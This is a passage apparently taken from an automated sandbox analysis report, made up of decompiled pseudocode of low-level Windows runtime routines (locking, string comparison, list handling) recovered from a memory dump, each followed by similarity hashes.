                                                              											E010295D0();
                                                              											L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                              											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                              										}
                                                              										_t49 = _t102;
                                                              										L4:
                                                              										return _t49;
                                                              									}
                                                              									E00FFEB70(_t93, 0x10d79a0);
                                                              									asm("lock xadd [esi], eax");
                                                              									if(__eflags == 0) {
                                                              										_push( *((intOrPtr*)(_t104 + 4)));
                                                              										E010295D0();
                                                              										L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                              										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                              									}
                                                              									 *_t102 = 1;
                                                              									asm("lock xadd [edi], eax");
                                                              									if(__eflags == 0) {
                                                              										_t28 = _t102 + 4; // 0xffffffff
                                                              										_push( *_t28);
                                                              										E010295D0();
                                                              										L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                                              									}
                                                              									continue;
                                                              								}
                                                              								_t93 =  &_v20;
                                                              								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                                              								_t85 = 6;
                                                              								_v20 = _t85;
                                                              								_t87 = E0101F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                              								__eflags = _t87;
                                                              								if(_t87 < 0) {
                                                              									goto L3;
                                                              								}
                                                              								 *((char*)(_t108 + 0xe)) = 1;
                                                              								goto L15;
                                                              							}
                                                              							__eflags = _t53 - 0xc000026e;
                                                              							if(__eflags != 0) {
                                                              								goto L3;
                                                              							}
                                                              							goto L12;
                                                              						}
                                                              						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                                              						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                                              							goto L3;
                                                              						} else {
                                                              							goto L9;
                                                              						}
                                                              					}
                                                              					L3:
                                                              					_t49 = _t104;
                                                              					goto L4;
                                                              				}
                                                              				_t49 = 0;
                                                              				goto L4;
                                                              			}


























                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 15b063e5f15a25ef6bc6fcd21bc4783dc8eb73d704864131b3d534a3d2296737
                                                              • Instruction ID: 31c2e80bd2175854b6f4eb26d31e4dfb3707a9291b089906fecd16ec9f94e5a9
                                                              • Opcode Fuzzy Hash: 15b063e5f15a25ef6bc6fcd21bc4783dc8eb73d704864131b3d534a3d2296737
                                                              • Instruction Fuzzy Hash: CF51FC71205792ABD322EF29C841B67BBE4FF50B14F10082EF6C597662E774E804DB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E01012AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                                                              				signed short* _v8;
                                                              				signed short* _v12;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				intOrPtr* _v28;
                                                              				signed int _v32;
                                                              				signed int _v36;
                                                              				short _t56;
                                                              				signed int _t57;
                                                              				intOrPtr _t58;
                                                              				signed short* _t61;
                                                              				intOrPtr _t72;
                                                              				intOrPtr _t75;
                                                              				intOrPtr _t84;
                                                              				intOrPtr _t87;
                                                              				intOrPtr* _t90;
                                                              				signed short* _t91;
                                                              				signed int _t95;
                                                              				signed short* _t96;
                                                              				intOrPtr _t97;
                                                              				intOrPtr _t102;
                                                              				signed int _t108;
                                                              				intOrPtr _t110;
                                                              				signed int _t111;
                                                              				signed short* _t112;
                                                              				void* _t113;
                                                              				signed int _t116;
                                                              				signed short** _t119;
                                                              				short* _t120;
                                                              				signed int _t123;
                                                              				signed int _t124;
                                                              				void* _t125;
                                                              				intOrPtr _t127;
                                                              				signed int _t128;
                                                              
                                                              				_t90 = __ecx;
                                                              				_v16 = __edx;
                                                              				_t108 = _a4;
                                                              				_v28 = __ecx;
                                                              				_t4 = _t108 - 1; // -1
                                                              				if(_t4 > 0x13) {
                                                              					L15:
                                                              					_t56 = 0xc0000100;
                                                              					L16:
                                                              					return _t56;
                                                              				}
                                                              				_t57 = _t108 * 0x1c;
                                                              				_v32 = _t57;
                                                              				_t6 = _t57 + 0x10d8204; // 0x0
                                                              				_t123 =  *_t6;
                                                              				_t7 = _t57 + 0x10d8208; // 0x10d8207
                                                              				_t8 = _t57 + 0x10d8208; // 0x10d8207
                                                              				_t119 = _t8;
                                                              				_v36 = _t123;
                                                              				_t110 = _t7 + _t123 * 8;
                                                              				_v24 = _t110;
                                                              				_t111 = _a4;
                                                              				if(_t119 >= _t110) {
                                                              					L12:
                                                              					if(_t123 != 3) {
                                                              						_t58 =  *0x10d8450; // 0x0
                                                              						if(_t58 == 0) {
                                                              							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                                                              						}
                                                              					} else {
                                                              						_t26 = _t57 + 0x10d821c; // 0x0
                                                              						_t58 =  *_t26;
                                                              					}
                                                              					 *_t90 = _t58;
                                                              					goto L15;
                                                              				} else {
                                                              					goto L2;
                                                              				}
                                                              				while(1) {
                                                              					_t116 =  *_t61 & 0x0000ffff;
                                                              					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                              					if(_t116 == _t128) {
                                                              						goto L18;
                                                              					}
                                                              					L5:
                                                              					if(_t116 >= 0x61) {
                                                              						if(_t116 > 0x7a) {
                                                              							_t97 =  *0x10d6d5c; // 0x7f8b0654
                                                              							_t72 =  *0x10d6d5c; // 0x7f8b0654
                                                              							_t75 =  *0x10d6d5c; // 0x7f8b0654
                                                              							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                                                              						} else {
                                                              							_t116 = _t116 - 0x20;
                                                              						}
                                                              					}
                                                              					if(_t128 >= 0x61) {
                                                              						if(_t128 > 0x7a) {
                                                              							_t102 =  *0x10d6d5c; // 0x7f8b0654
                                                              							_t84 =  *0x10d6d5c; // 0x7f8b0654
                                                              							_t87 =  *0x10d6d5c; // 0x7f8b0654
                                                              							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                                                              						} else {
                                                              							_t128 = _t128 - 0x20;
                                                              						}
                                                              					}
                                                              					if(_t116 == _t128) {
                                                              						_t61 = _v12;
                                                              						_t96 = _v8;
                                                              					} else {
                                                              						_t113 = _t116 - _t128;
                                                              						L9:
                                                              						_t111 = _a4;
                                                              						if(_t113 == 0) {
                                                              							_t115 =  &(( *_t119)[_t111 + 1]);
                                                              							_t33 =  &(_t119[1]); // 0x100
                                                              							_t120 = _a8;
                                                              							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                                                              							_t35 = _t95 - 1; // 0xff
                                                              							_t124 = _t35;
                                                              							if(_t120 == 0) {
                                                              								L27:
                                                              								 *_a16 = _t95;
                                                              								_t56 = 0xc0000023;
                                                              								goto L16;
                                                              							}
                                                              							if(_t124 >= _a12) {
                                                              								if(_a12 >= 1) {
                                                              									 *_t120 = 0;
                                                              								}
                                                              								goto L27;
                                                              							}
                                                              							 *_a16 = _t124;
                                                              							_t125 = _t124 + _t124;
                                                              							E0102F3E0(_t120, _t115, _t125);
                                                              							_t56 = 0;
                                                              							 *((short*)(_t125 + _t120)) = 0;
                                                              							goto L16;
                                                              						}
                                                              						_t119 =  &(_t119[2]);
                                                              						if(_t119 < _v24) {
                                                              							L2:
                                                              							_t91 =  *_t119;
                                                              							_t61 = _t91;
                                                              							_v12 = _t61;
                                                              							_t112 =  &(_t61[_t111]);
                                                              							_v8 = _t112;
                                                              							if(_t61 >= _t112) {
                                                              								break;
                                                              							} else {
                                                              								_t127 = _v16 - _t91;
                                                              								_t96 = _t112;
                                                              								_v20 = _t127;
                                                              								_t116 =  *_t61 & 0x0000ffff;
                                                              								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                              								if(_t116 == _t128) {
                                                              									goto L18;
                                                              								}
                                                              								goto L5;
                                                              							}
                                                              						} else {
                                                              							_t90 = _v28;
                                                              							_t57 = _v32;
                                                              							_t123 = _v36;
                                                              							goto L12;
                                                              						}
                                                              					}
                                                              					L18:
                                                              					_t61 =  &(_t61[1]);
                                                              					_v12 = _t61;
                                                              					if(_t61 >= _t96) {
                                                              						break;
                                                              					}
                                                              					_t127 = _v20;
                                                              				}
                                                              				_t113 = 0;
                                                              				goto L9;
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 061ed355c686e3cc166f059a8aec042baaa32ca542b0f2ce5973a60fa12614d3
                                                              • Instruction ID: ce2f959345b10d6cae98992690af84014f318e19235f786b2fd214a3ad5a74ff
                                                              • Opcode Fuzzy Hash: 061ed355c686e3cc166f059a8aec042baaa32ca542b0f2ce5973a60fa12614d3
                                                              • Instruction Fuzzy Hash: A851A176A00125CFCB18DF1CC8909BDB7F1FB88700725845AE9C6DB369D739AA91CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 86%
                                                              			E0100DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                              				char _v5;
                                                              				signed int _v12;
                                                              				signed int* _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				intOrPtr _v36;
                                                              				intOrPtr _v40;
                                                              				intOrPtr _v44;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				signed int _t54;
                                                              				char* _t58;
                                                              				signed int _t66;
                                                              				intOrPtr _t67;
                                                              				intOrPtr _t68;
                                                              				intOrPtr _t72;
                                                              				intOrPtr _t73;
                                                              				signed int* _t75;
                                                              				intOrPtr _t79;
                                                              				intOrPtr _t80;
                                                              				char _t82;
                                                              				signed int _t83;
                                                              				signed int _t84;
                                                              				signed int _t88;
                                                              				signed int _t89;
                                                              				intOrPtr _t90;
                                                              				intOrPtr _t92;
                                                              				signed int _t97;
                                                              				intOrPtr _t98;
                                                              				intOrPtr* _t99;
                                                              				signed int* _t101;
                                                              				signed int* _t102;
                                                              				intOrPtr* _t103;
                                                              				intOrPtr _t105;
                                                              				signed int _t106;
                                                              				void* _t118;
                                                              
                                                              				_t92 = __edx;
                                                              				_t75 = _a4;
                                                              				_t98 = __ecx;
                                                              				_v44 = __edx;
                                                              				_t106 = _t75[1];
                                                              				_v40 = __ecx;
                                                              				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                                                              					_t82 = 0;
                                                              				} else {
                                                              					_t82 = 1;
                                                              				}
                                                              				_v5 = _t82;
                                                              				_t6 = _t98 + 0xc8; // 0xc9
                                                              				_t101 = _t6;
                                                              				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                                                              				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                                                              				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                                                              				if(_t82 != 0) {
                                                              					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                                                              					_t83 =  *_t75;
                                                              					_t54 = _t75[1];
                                                              					 *_t101 = _t83;
                                                              					_t84 = _t83 | _t54;
                                                              					_t101[1] = _t54;
                                                              					if(_t84 == 0) {
                                                              						_t101[1] = _t101[1] & _t84;
                                                              						 *_t101 = 1;
                                                              					}
                                                              					goto L19;
                                                              				} else {
                                                              					if(_t101 == 0) {
                                                              						E00FECC50(E00FE4510(0xc000000d));
                                                              						_t88 =  *_t101;
                                                              						_t97 = _t101[1];
                                                              						L15:
                                                              						_v12 = _t88;
                                                              						_t66 = _t88 -  *_t75;
                                                              						_t89 = _t97;
                                                              						asm("sbb ecx, [ebx+0x4]");
                                                              						_t118 = _t89 - _t97;
                                                              						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                                                              							_t66 = _t66 | 0xffffffff;
                                                              							_t89 = 0x7fffffff;
                                                              						}
                                                              						 *_t101 = _t66;
                                                              						_t101[1] = _t89;
                                                              						L19:
                                                              						if(E01007D50() != 0) {
                                                              							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              						} else {
                                                              							_t58 = 0x7ffe0386;
                                                              						}
                                                              						_t102 = _v16;
                                                              						if( *_t58 != 0) {
                                                              							_t58 = E010B8ED6(_t102, _t98);
                                                              						}
                                                              						_t76 = _v44;
                                                              						E01002280(_t58, _v44);
                                                              						E0100DD82(_v44, _t102, _t98);
                                                              						E0100B944(_t102, _v5);
                                                              						return E00FFFFB0(_t76, _t98, _t76);
                                                              					}
                                                              					_t99 = 0x7ffe03b0;
                                                              					do {
                                                              						_t103 = 0x7ffe0010;
                                                              						do {
                                                              							_t67 =  *0x10d8628; // 0x0
                                                              							_v28 = _t67;
                                                              							_t68 =  *0x10d862c; // 0x0
                                                              							_v32 = _t68;
                                                              							_v24 =  *((intOrPtr*)(_t99 + 4));
                                                              							_v20 =  *_t99;
                                                              							while(1) {
                                                              								_t97 =  *0x7ffe000c;
                                                              								_t90 =  *0x7FFE0008;
                                                              								if(_t97 ==  *_t103) {
                                                              									goto L10;
                                                              								}
                                                              								asm("pause");
                                                              							}
                                                              							L10:
                                                              							_t79 = _v24;
                                                              							_t99 = 0x7ffe03b0;
                                                              							_v12 =  *0x7ffe03b0;
                                                              							_t72 =  *0x7FFE03B4;
                                                              							_t103 = 0x7ffe0010;
                                                              							_v36 = _t72;
                                                              						} while (_v20 != _v12 || _t79 != _t72);
                                                              						_t73 =  *0x10d8628; // 0x0
                                                              						_t105 = _v28;
                                                              						_t80 =  *0x10d862c; // 0x0
                                                              					} while (_t105 != _t73 || _v32 != _t80);
                                                              					_t98 = _v40;
                                                              					asm("sbb edx, [ebp-0x20]");
                                                              					_t88 = _t90 - _v12 - _t105;
                                                              					_t75 = _a4;
                                                              					asm("sbb edx, eax");
                                                              					_t31 = _t98 + 0xc8; // 0x10afb53
                                                              					_t101 = _t31;
                                                              					 *_t101 = _t88;
                                                              					_t101[1] = _t97;
                                                              					goto L15;
                                                              				}
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c1197f10770dc1659f7b0c2fce117ecb8ab03a8985a204fe012eac07b5c8ef2d
                                                              • Instruction ID: d66cbc83e01bbd13a3ea965374bf5301609076fbdbfba77775c40afbdf460354
                                                              • Opcode Fuzzy Hash: c1197f10770dc1659f7b0c2fce117ecb8ab03a8985a204fe012eac07b5c8ef2d
                                                              • Instruction Fuzzy Hash: 2E51C375A01606DFDB16DFE8C480B9EFBF1BF48310F24815AD995A7385DB31A944CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 96%
                                                              			E00FFEF40(intOrPtr __ecx) {
                                                              				char _v5;
                                                              				char _v6;
                                                              				char _v7;
                                                              				char _v8;
                                                              				signed int _v12;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				intOrPtr _t58;
                                                              				char _t59;
                                                              				signed char _t69;
                                                              				void* _t73;
                                                              				signed int _t74;
                                                              				char _t79;
                                                              				signed char _t81;
                                                              				signed int _t85;
                                                              				signed int _t87;
                                                              				intOrPtr _t90;
                                                              				signed char* _t91;
                                                              				void* _t92;
                                                              				signed int _t94;
                                                              				void* _t96;
                                                              
                                                              				_t90 = __ecx;
                                                              				_v16 = __ecx;
                                                              				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                                              					_t58 =  *((intOrPtr*)(__ecx));
                                                              					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                                              						E00FE9080(_t73, __ecx, __ecx, _t92);
                                                              					}
                                                              				}
                                                              				_t74 = 0;
                                                              				_t96 =  *0x7ffe036a - 1;
                                                              				_v12 = 0;
                                                              				_v7 = 0;
                                                              				if(_t96 > 0) {
                                                              					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                                              					_v12 = _t74;
                                                              					_v7 = _t96 != 0;
                                                              				}
                                                              				_t79 = 0;
                                                              				_v8 = 0;
                                                              				_v5 = 0;
                                                              				while(1) {
                                                              					L4:
                                                              					_t59 = 1;
                                                              					L5:
                                                              					while(1) {
                                                              						if(_t59 == 0) {
                                                              							L12:
                                                              							_t21 = _t90 + 4; // 0x77dfc21e
                                                              							_t87 =  *_t21;
                                                              							_v6 = 0;
                                                              							if(_t79 != 0) {
                                                              								if((_t87 & 0x00000002) != 0) {
                                                              									goto L19;
                                                              								}
                                                              								if((_t87 & 0x00000001) != 0) {
                                                              									_v6 = 1;
                                                              									_t74 = _t87 ^ 0x00000003;
                                                              								} else {
                                                              									_t51 = _t87 - 2; // -2
                                                              									_t74 = _t51;
                                                              								}
                                                              								goto L15;
                                                              							} else {
                                                              								if((_t87 & 0x00000001) != 0) {
                                                              									_v6 = 1;
                                                              									_t74 = _t87 ^ 0x00000001;
                                                              								} else {
                                                              									_t26 = _t87 - 4; // -4
                                                              									_t74 = _t26;
                                                              									if((_t74 & 0x00000002) == 0) {
                                                              										_t74 = _t74 - 2;
                                                              									}
                                                              								}
                                                              								L15:
                                                              								if(_t74 == _t87) {
                                                              									L19:
                                                              									E00FE2D8A(_t74, _t90, _t87, _t90);
                                                              									_t74 = _v12;
                                                              									_v8 = 1;
                                                              									if(_v7 != 0 && _t74 > 0x64) {
                                                              										_t74 = _t74 - 1;
                                                              										_v12 = _t74;
                                                              									}
                                                              									_t79 = _v5;
                                                              									goto L4;
                                                              								}
                                                              								asm("lock cmpxchg [esi], ecx");
                                                              								if(_t87 != _t87) {
                                                              									_t74 = _v12;
                                                              									_t59 = 0;
                                                              									_t79 = _v5;
                                                              									continue;
                                                              								}
                                                              								if(_v6 != 0) {
                                                              									_t74 = _v12;
                                                              									L25:
                                                              									if(_v7 != 0) {
                                                              										if(_t74 < 0x7d0) {
                                                              											if(_v8 == 0) {
                                                              												_t74 = _t74 + 1;
                                                              											}
                                                              										}
                                                              										_t38 = _t90 + 0x14; // 0x0
                                                              										_t39 = _t90 + 0x14; // 0x0
                                                              										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                                              										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                              											_t85 = _t85 & 0xff000000;
                                                              										}
                                                              										 *(_t90 + 0x14) = _t85;
                                                              									}
                                                              									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                              									 *((intOrPtr*)(_t90 + 8)) = 1;
                                                              									return 0;
                                                              								}
                                                              								_v5 = 1;
                                                              								_t87 = _t74;
                                                              								goto L19;
                                                              							}
                                                              						}
                                                              						_t94 = _t74;
                                                              						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                                              						if(_t74 == 0) {
                                                              							goto L12;
                                                              						} else {
                                                              							_t91 = _t90 + 4;
                                                              							goto L8;
                                                              							L9:
                                                              							while((_t81 & 0x00000001) != 0) {
                                                              								_t69 = _t81;
                                                              								asm("lock cmpxchg [edi], edx");
                                                              								if(_t69 != _t81) {
                                                              									_t81 = _t69;
                                                              									continue;
                                                              								}
                                                              								_t90 = _v16;
                                                              								goto L25;
                                                              							}
                                                              							asm("pause");
                                                              							_t94 = _t94 - 1;
                                                              							if(_t94 != 0) {
                                                              								L8:
                                                              								_t81 =  *_t91;
                                                              								goto L9;
                                                              							} else {
                                                              								_t90 = _v16;
                                                              								_t79 = _v5;
                                                              								goto L12;
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              			}





























                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                              • Instruction ID: acd7c75c5c6f4bee580a0204eb6e4f62658d239eccf29f15ad638d3c3eb39435
                                                              • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                              • Instruction Fuzzy Hash: 7351F331E0424D9FDB24CF68C0D07BEBBB1AF45324F2881B8D645933A2C775A989E791
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 84%
                                                              			E010B740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                                              				signed short* _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _t55;
                                                              				void* _t56;
                                                              				intOrPtr* _t66;
                                                              				intOrPtr* _t69;
                                                              				void* _t74;
                                                              				intOrPtr* _t78;
                                                              				intOrPtr* _t81;
                                                              				intOrPtr* _t82;
                                                              				intOrPtr _t83;
                                                              				signed short* _t84;
                                                              				intOrPtr _t85;
                                                              				signed int _t87;
                                                              				intOrPtr* _t90;
                                                              				intOrPtr* _t93;
                                                              				intOrPtr* _t94;
                                                              				void* _t98;
                                                              
                                                              				_t84 = __edx;
                                                              				_t80 = __ecx;
                                                              				_push(__ecx);
                                                              				_push(__ecx);
                                                              				_t55 = __ecx;
                                                              				_v8 = __edx;
                                                              				_t87 =  *__edx & 0x0000ffff;
                                                              				_v12 = __ecx;
                                                              				_t3 = _t55 + 0x154; // 0x154
                                                              				_t93 = _t3;
                                                              				_t78 =  *_t93;
                                                              				_t4 = _t87 + 2; // 0x2
                                                              				_t56 = _t4;
                                                              				while(_t78 != _t93) {
                                                              					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                                              						L4:
                                                              						_t78 =  *_t78;
                                                              						continue;
                                                              					} else {
                                                              						_t7 = _t78 + 0x18; // 0x18
                                                              						if(E0103D4F0(_t7, _t84[2], _t87) == _t87) {
                                                              							_t40 = _t78 + 0xc; // 0xc
                                                              							_t94 = _t40;
                                                              							_t90 =  *_t94;
                                                              							while(_t90 != _t94) {
                                                              								_t41 = _t90 + 8; // 0x8
                                                              								_t74 = E0102F380(_a4, _t41, 0x10);
                                                              								_t98 = _t98 + 0xc;
                                                              								if(_t74 != 0) {
                                                              									_t90 =  *_t90;
                                                              									continue;
                                                              								}
                                                              								goto L12;
                                                              							}
                                                              							_t82 = L01004620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                              							if(_t82 != 0) {
                                                              								_t46 = _t78 + 0xc; // 0xc
                                                              								_t69 = _t46;
                                                              								asm("movsd");
                                                              								asm("movsd");
                                                              								asm("movsd");
                                                              								asm("movsd");
                                                              								_t85 =  *_t69;
                                                              								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                              									L20:
                                                              									_t82 = 3;
                                                              									asm("int 0x29");
                                                              								}
                                                              								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                                              								 *_t82 = _t85;
                                                              								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                                              								 *_t69 = _t82;
                                                              								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                                              								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                                              								goto L11;
                                                              							} else {
                                                              								L18:
                                                              								_push(0xe);
                                                              								_pop(0);
                                                              							}
                                                              						} else {
                                                              							_t84 = _v8;
                                                              							_t9 = _t87 + 2; // 0x2
                                                              							_t56 = _t9;
                                                              							goto L4;
                                                              						}
                                                              					}
                                                              					L12:
                                                              					return 0;
                                                              				}
                                                              				_t10 = _t87 + 0x1a; // 0x1a
                                                              				_t78 = L01004620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                                              				if(_t78 == 0) {
                                                              					goto L18;
                                                              				} else {
                                                              					_t12 = _t87 + 2; // 0x2
                                                              					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                                              					_t16 = _t78 + 0x18; // 0x18
                                                              					E0102F3E0(_t16, _v8[2], _t87);
                                                              					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                                              					_t19 = _t78 + 0xc; // 0xc
                                                              					_t66 = _t19;
                                                              					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                                              					 *_t66 = _t66;
                                                              					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                                              					_t81 = L01004620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                              					if(_t81 == 0) {
                                                              						goto L18;
                                                              					} else {
                                                              						_t26 = _t78 + 0xc; // 0xc
                                                              						_t69 = _t26;
                                                              						asm("movsd");
                                                              						asm("movsd");
                                                              						asm("movsd");
                                                              						asm("movsd");
                                                              						_t85 =  *_t69;
                                                              						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                              							goto L20;
                                                              						} else {
                                                              							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                                              							 *_t81 = _t85;
                                                              							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                                              							 *_t69 = _t81;
                                                              							_t83 = _v12;
                                                              							 *(_t78 + 8) = 1;
                                                              							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                              							_t34 = _t83 + 0x154; // 0x1ba
                                                              							_t69 = _t34;
                                                              							_t85 =  *_t69;
                                                              							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                              								goto L20;
                                                              							} else {
                                                              								 *_t78 = _t85;
                                                              								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                                              								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                                              								 *_t69 = _t78;
                                                              								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                              							}
                                                              						}
                                                              						goto L11;
                                                              					}
                                                              				}
                                                              				goto L12;
                                                              			}






















                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                              • Instruction ID: 182c1e226bf7f8f6f8658c49a7618688e4b80085c0c3d0c9df78b54c4c627f15
                                                              • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                              • Instruction Fuzzy Hash: FB51A071600646EFDB16CF18C980A96BBF5FF85304F14C0AAE948DF292E7B1E945CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 97%
                                                              			E01012990() {
                                                              				signed int* _t62;
                                                              				signed int _t64;
                                                              				intOrPtr _t66;
                                                              				signed short* _t69;
                                                              				intOrPtr _t76;
                                                              				signed short* _t79;
                                                              				void* _t81;
                                                              				signed int _t82;
                                                              				signed short* _t83;
                                                              				signed int _t87;
                                                              				intOrPtr _t91;
                                                              				void* _t98;
                                                              				signed int _t99;
                                                              				void* _t101;
                                                              				signed int* _t102;
                                                              				void* _t103;
                                                              				void* _t104;
                                                              				void* _t107;
                                                              
                                                              				_push(0x20);
                                                              				_push(0x10bff00);
                                                              				E0103D08C(_t81, _t98, _t101);
                                                              				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                                                              				_t99 = 0;
                                                              				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                                                              				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                                                              				if(_t82 == 0) {
                                                              					_t62 = 0xc0000100;
                                                              				} else {
                                                              					 *((intOrPtr*)(_t103 - 4)) = 0;
                                                              					_t102 = 0xc0000100;
                                                              					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                                                              					_t64 = 4;
                                                              					while(1) {
                                                              						 *(_t103 - 0x24) = _t64;
                                                              						if(_t64 == 0) {
                                                              							break;
                                                              						}
                                                              						_t87 = _t64 * 0xc;
                                                              						 *(_t103 - 0x2c) = _t87;
                                                              						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0xfc1664));
                                                              						if(_t107 <= 0) {
                                                              							if(_t107 == 0) {
                                                              								_t79 = E0102E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0xfc1668)), _t82);
                                                              								_t104 = _t104 + 0xc;
                                                              								__eflags = _t79;
                                                              								if(__eflags == 0) {
                                                              									_t102 = E010651BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0xfc166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                              									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                                                              									break;
                                                              								} else {
